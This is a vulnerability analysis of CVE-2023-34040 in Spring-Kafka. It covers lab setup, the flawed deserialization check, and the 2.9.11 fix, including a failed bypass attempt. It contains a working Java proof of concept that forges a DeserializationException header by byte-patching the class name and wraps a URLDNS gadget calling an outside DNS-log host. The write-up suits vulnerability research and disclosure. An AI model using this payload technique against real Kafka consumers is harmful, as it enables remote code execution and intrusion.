Spring-Kafka Deserialization Vulnerability (CVE-2023-34040) Analysis

When an affected version of a Spring-Kafka Consumer does not configure an ErrorHandlingDeserializer for the Record's key or value, yet sets checkDeserExWhenKeyNull or checkDeserExWhenValueNull to true, and an attacker can publish Kafka messages, a Java deserialization vulnerability exists. The attacker only needs to publish a message whose key or value is null and place serialized data in the corresponding header to achieve arbitrary deserialization.

Spring-Kafka

The version compatibility matrix for Spring-Kafka, kafka-clients, and Spring Boot is documented at https://spring.io/projects/spring-kafka#overview

Kafka can run with ZooKeeper or in KRaft mode; here we start Kafka in KRaft mode with Docker:

docker run --rm -d --name kafka-server --hostname localhost -p 9092:9092 \
  -e KAFKA_CFG_NODE_ID=0 \
  -e KAFKA_CFG_PROCESS_ROLES=controller,broker \
  -e KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093 \
  -e KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT \
  -e KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@localhost:9093 \
  -e KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER \
  bitnami/kafka:3.5.1
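
As a quick sanity check, list the topics from inside the container (this assumes the bitnami image's bundled Kafka CLI scripts are on the PATH, which they are in recent tags):

docker exec kafka-server kafka-topics.sh --bootstrap-server 127.0.0.1:9092 --list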

Create a Maven project in IDEA and add the dependencies:

<dependency>
    <groupId>org.springframework.kafka</groupId>
    <artifactId>spring-kafka</artifactId>
    <version>2.9.10</version>
</dependency>
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
    <version>2.7.8</version>
</dependency>

Following https://docs.spring.io/spring-kafka/docs/2.9.10/reference/html/#getting-started , write a Consumer and Producer demo:

spring:
  kafka:
    bootstrap-servers: 127.0.0.1:9092
package org.example;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.kafka.annotation.KafkaListener;

@SpringBootApplication
public class Application {

    public static void main(String[] args) {
        SpringApplication.run(Application.class, args);
    }

    @KafkaListener(id = "myId", topics = "myTopic")
    public void listen(String in) {
        System.out.println(in);
    }

}
package org.example;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.kafka.core.KafkaTemplate;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class Controller {

    @Autowired
    private KafkaTemplate<Object, Object> template;

    @GetMapping(path = "/send")
    public void send() {
        this.template.send("myTopic", "hello");
    }

}
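
Start the application and hit the endpoint (Spring Boot's embedded server listens on 8080 by default); the listener should print hello to the console:

curl http://127.0.0.1:8080/send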

Vulnerability Analysis

According to the official advisory at https://spring.io/security/cve-2023-34040 , the affected component and versions are Spring for Apache Kafka 2.8.1 to 2.9.10 and 3.0.0 to 3.0.9 (the 2.9.10 used above is the last affected 2.9.x release). Exploitation requires all of the following:

  • No ErrorHandlingDeserializer is configured for the Record's key or value
  • checkDeserExWhenKeyNull or checkDeserExWhenValueNull is set to true
  • Untrusted sources are allowed to publish to a Kafka topic

The vulnerability triggers on the Consumer side. Modify the Consumer to set checkDeserExWhenKeyNull and checkDeserExWhenValueNull:

package org.example;

import org.apache.kafka.clients.consumer.ConsumerConfig;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.boot.autoconfigure.kafka.KafkaProperties;
import org.springframework.context.annotation.Bean;
import org.springframework.kafka.annotation.KafkaListener;
import org.springframework.kafka.config.ConcurrentKafkaListenerContainerFactory;
import org.springframework.kafka.core.DefaultKafkaConsumerFactory;
import org.apache.kafka.common.serialization.StringDeserializer;

import java.util.HashMap;
import java.util.Map;

@SpringBootApplication
public class Application {

    public static void main(String[] args) {
        SpringApplication.run(Application.class, args);
    }

    @KafkaListener(id = "myId", topics = "myTopic")
    public void listen(String in) {
        System.out.println(in);
    }

    @Autowired
    private KafkaProperties kafkaProperties;

    @Bean
    public ConcurrentKafkaListenerContainerFactory<String, String> kafkaListenerContainerFactory() {
        Map<String, Object> props = new HashMap<>();
        props.put(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, kafkaProperties.getBootstrapServers());
        props.put(ConsumerConfig.KEY_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);
        props.put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);

        ConcurrentKafkaListenerContainerFactory<String, String> factory = new ConcurrentKafkaListenerContainerFactory<>();
        factory.setConsumerFactory(new DefaultKafkaConsumerFactory<>(props));
        // The two container options at the heart of CVE-2023-34040
        factory.getContainerProperties().setCheckDeserExWhenKeyNull(true);
        factory.getContainerProperties().setCheckDeserExWhenValueNull(true);
        return factory;
    }

}

Also modify the Producer so the key, value, and headers can be customized:

package org.example;

import org.apache.kafka.clients.producer.ProducerRecord;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.kafka.core.KafkaTemplate;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class Controller {

    @Autowired
    private KafkaTemplate<Object, Object> template;

    @GetMapping(path = "/send")
    public void send() {
        // Arguments are (topic, key, value): the value is deliberately null
        ProducerRecord<Object, Object> producerRecord = new ProducerRecord<Object, Object>("myTopic", "key", null);
        this.template.send(producerRecord);
    }
}

As the names checkDeserExWhenKeyNull and checkDeserExWhenValueNull suggest, when these two options are true and the Record's key or value is null, the deserialization path is triggered; that is why the code above sets the value to null.
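
Conceptually, the container behaves like the sketch below when a record arrives (the helper name exceptionHeaderFor and the check order are my assumptions, not spring-kafka's actual code):

import org.apache.kafka.clients.consumer.ConsumerRecord;
import org.apache.kafka.common.header.Header;

public class NullCheckSketch {

    // With the flags enabled, a null value (or key) makes the container look up
    // the corresponding springDeserializerException* header, whose bytes the
    // affected versions then deserialize.
    static Header exceptionHeaderFor(ConsumerRecord<?, ?> record,
            boolean checkDeserExWhenKeyNull, boolean checkDeserExWhenValueNull) {
        if (checkDeserExWhenValueNull && record.value() == null) {
            return record.headers().lastHeader("springDeserializerExceptionValue");
        }
        if (checkDeserExWhenKeyNull && record.key() == null) {
            return record.headers().lastHeader("springDeserializerExceptionKey");
        }
        return null;
    }
}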

Set a breakpoint at org.springframework.kafka.listener.ListenerUtils#getExceptionFromHeader and send a message from the Producer.

When the value is null, the method fetches the springDeserializerExceptionValue header. Next, modify the Producer code to add that header and send a message again:

public void send() {
    ProducerRecord<Object, Object> producerRecord = new ProducerRecord<Object, Object>("myTopic", "key", null);
    // Arbitrary bytes for now, just to reach the deserialization code path
    producerRecord.headers().add("springDeserializerExceptionValue", "leixiao".getBytes());
    this.template.send(producerRecord);
}

Deserialization ultimately happens in org.springframework.kafka.listener.ListenerUtils#byteArrayToDeserializationException.

This method overrides resolveClass to restrict what can be deserialized: the class name must be org.springframework.kafka.support.serializer.DeserializationException. However, a this.first field makes the check apply only to the first class descriptor in the stream. If that class has fields of other types, or nests the serialized data of other objects, everything nested still deserializes normally.
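
A simplified reconstruction of that vulnerable check, following the this.first pattern described above (a sketch, not the verbatim spring-kafka source):

package org.example;

import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;

import org.springframework.kafka.support.serializer.DeserializationException;

public class ResolveClassSketch {

    // Only the FIRST class descriptor in the stream is validated; nested
    // objects (e.g. a HashMap stored in a field) resolve without any check.
    static DeserializationException fromHeaderBytes(byte[] value) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(value)) {
            private boolean first = true;

            @Override
            protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
                if (this.first && !desc.getName().equals(DeserializationException.class.getName())) {
                    throw new IllegalStateException("Header does not contain a DeserializationException");
                }
                this.first = false;
                return super.resolveClass(desc);
            }
        }) {
            return (DeserializationException) ois.readObject();
        }
    }
}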

To build serialized data whose top-level class is org.springframework.kafka.support.serializer.DeserializationException while nesting other objects inside it, we can first define a class named xrg.springframework.kafka.support.serializer.DeserializationException (identical to the real name except for the first byte), construct its fields freely, and finally patch the class name directly in the serialized bytes. POC:

package xrg.springframework.kafka.support.serializer;

import java.io.Serializable;

public class DeserializationException implements Serializable {

    // Copied from the real org.springframework.kafka.support.serializer.DeserializationException;
    // the stream's serialVersionUID must match the Consumer-side class, otherwise
    // ObjectInputStream throws InvalidClassException.
    private static final long serialVersionUID = 8280022391259546509L;

    // Carrier field for the actual gadget payload
    private Object foo;

    public DeserializationException(Object foo) {
        this.foo = foo;
    }
}
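
Note that the real DeserializationException declares no foo field. That does not matter: Java serialization reads (and then discards) stream fields unknown to the local class, and reading the value fully deserializes the nested object graph, which is enough to fire a gadget.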
package org.example;

import org.apache.kafka.clients.producer.ProducerRecord;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.kafka.core.KafkaTemplate;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RestController;

import java.io.*;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;

@RestController
public class Controller {

    @Autowired
    private KafkaTemplate<Object, Object> template;

    @GetMapping(path = "/send")
    public void send() throws Exception {
        ProducerRecord<Object, Object> producerRecord = new ProducerRecord<Object, Object>("myTopic", "key", null);
        producerRecord.headers().add("springDeserializerExceptionValue", getPOC());
        this.template.send(producerRecord);
    }

    public static byte[] getPOC() throws Exception {
        Object urldns = getURLDNS("http://leixiao.cff03fad.dnslog.store");
        Object o = new xrg.springframework.kafka.support.serializer.DeserializationException(urldns);
        byte[] data = serialize(o);
        // Stream layout: AC ED (magic), 00 05 (version), TC_OBJECT, TC_CLASSDESC,
        // then a 2-byte name length, so the class name starts at offset 8.
        // Patch the leading 'x' to 'o': xrg.springframework... becomes org.springframework...
        data[8] = "o".getBytes()[0];
        return data;
    }

    public static Object getURLDNS(final String url) throws Exception {
        // Use a no-op handler so building the payload does not resolve DNS locally
        URLStreamHandler handler = new SilentURLStreamHandler();
        HashMap<URL, String> hashMap = new HashMap<URL, String>();
        URL u = new URL(null, url, handler);
        hashMap.put(u, url);
        // Reset the cached hashCode so the victim recomputes it (and resolves DNS)
        // when HashMap.readObject() rehashes the key during deserialization
        Field hashcode = u.getClass().getDeclaredField("hashCode");
        hashcode.setAccessible(true);
        hashcode.set(u, -1);
        return hashMap;
    }

    static class SilentURLStreamHandler extends URLStreamHandler {

        protected URLConnection openConnection(URL u) throws IOException {
            return null;
        }

        protected synchronized InetAddress getHostAddress(URL u) {
            return null;
        }
    }

    public static byte[] serialize(final Object obj) throws Exception {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(obj);
        return byteArrayOutputStream.toByteArray();
    }

}
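
Request /send again and watch the DNS log: a lookup for the embedded hostname means the Consumer deserialized the nested HashMap, whose readObject() rehashed the URL key and resolved the host via URL.hashCode().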

This builds a URLDNS POC; any other gadget present on the Consumer's classpath can be wrapped the same way.

Vulnerability Fix

Switch the spring-kafka version to 2.9.11 and rerun the POC. It now errors with ...[Payload value must not be empty]... Perhaps the new version no longer allows a null value? Try a null key instead:

ProducerRecord<Object,Object> producerRecord = new ProducerRecord<Object,Object>("myTopic",null,"value");
producerRecord.headers().add("springDeserializerExceptionKey", getPOC());

Running the POC now, execution no longer reaches org.springframework.kafka.listener.ListenerUtils#getExceptionFromHeader, and the console warns:

WARN 62418 --- [     myId-0-C-1] o.s.k.l.KafkaMessageListenerContainer    : Foreign deserialization exception header in (myTopic-0@10) ignored; possible attack?
value

The relevant logic is in org.springframework.kafka.support.serializer.SerializationUtils#getExceptionFromHeader.
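
Roughly, the patched method refuses to deserialize unless the header is spring-kafka's own DeserializationExceptionHeader. A sketch of the shape of the check (the real code tests the actual type; this sketch compares by class name just to stay self-contained):

import org.apache.kafka.clients.consumer.ConsumerRecord;
import org.apache.kafka.common.header.Header;

public class FixSketch {

    // Only a header created internally by spring-kafka is ever deserialized;
    // a plain RecordHeader arriving off the wire is ignored with a warning.
    static byte[] trustedExceptionBytes(ConsumerRecord<?, ?> record, String headerName) {
        Header header = record.headers().lastHeader(headerName);
        if (header == null) {
            return null;
        }
        if (!header.getClass().getName().endsWith("DeserializationExceptionHeader")) {
            System.out.println("Foreign deserialization exception header ignored; possible attack?");
            return null;
        }
        return header.value();
    }
}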

As the code shows, execution continues only when the header is a DeserializationExceptionHeader, but our header is a RecordHeader. I tried to bypass this by reflectively swapping the header type in the Producer:

Class<?> exceptionHeaderClass = Class.forName("org.springframework.kafka.support.serializer.DeserializationExceptionHeader");
Constructor<?> exceptionHeaderConstructor = exceptionHeaderClass.getDeclaredConstructors()[0];
exceptionHeaderConstructor.setAccessible(true);
Header exceptionHeader = (Header) exceptionHeaderConstructor.newInstance("springDeserializerExceptionKey", getPOC());
Header[] headers = new Header[]{exceptionHeader};

ProducerRecord<Object, Object> producerRecord = new ProducerRecord<Object, Object>("myTopic", null, "value");

// ProducerRecord.headers is final, so strip the FINAL modifier before writing.
// (The "modifiers" field trick only works on older JDKs; JDK 12+ blocks it.)
Field headersField = producerRecord.getClass().getDeclaredField("headers");
headersField.setAccessible(true);
Field modifiersField = Field.class.getDeclaredField("modifiers");
modifiersField.setAccessible(true);
modifiersField.setInt(headersField, headersField.getModifiers() & ~Modifier.FINAL);
headersField.set(producerRecord, new RecordHeaders(headers));

this.template.send(producerRecord);

But the header in the Record the Consumer receives is still a RecordHeader. Capturing the traffic with Wireshark shows why: the two header types leave no trace in the packets, which carry each header purely as a length-prefixed key/value pair. In other words, the header type the Consumer sees is not something the Producer can control.

Setting a breakpoint in the RecordHeader constructor locates where the Consumer builds the Record: org.apache.kafka.common.record.DefaultRecord#readFrom(java.nio.ByteBuffer, int, int, long, long, int, java.lang.Long)

The headers are built in org.apache.kafka.common.record.DefaultRecord#readHeaders

Unfortunately, as that code shows, an inbound header can only ever be a RecordHeader, so this bypass is a dead end.
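
A simplified sketch of the shape of that decode loop (not the verbatim kafka-clients source; the helper decoders below are hypothetical stand-ins for its varint handling):

import java.nio.ByteBuffer;

import org.apache.kafka.common.header.Header;
import org.apache.kafka.common.header.internals.RecordHeader;

public class ReadHeadersSketch {

    // Each wire header is just a length-prefixed key and value, and every one is
    // materialized as a RecordHeader; there is no type tag a producer could set.
    static Header[] readHeaders(ByteBuffer buffer, int numHeaders) {
        Header[] headers = new Header[numHeaders];
        for (int i = 0; i < numHeaders; i++) {
            String key = readString(buffer);   // hypothetical decoder
            byte[] value = readBytes(buffer);  // hypothetical decoder
            headers[i] = new RecordHeader(key, value);
        }
        return headers;
    }

    // Hypothetical helpers; the real format length-prefixes with a varint.
    static String readString(ByteBuffer b) {
        return new String(readBytes(b));
    }

    static byte[] readBytes(ByteBuffer b) {
        int len = b.getInt(); // simplification: the real encoding is a varint
        byte[] out = new byte[len];
        b.get(out);
        return out;
    }
}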

The full fix is at https://github.com/spring-projects/spring-kafka/pull/2770/files

References

https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040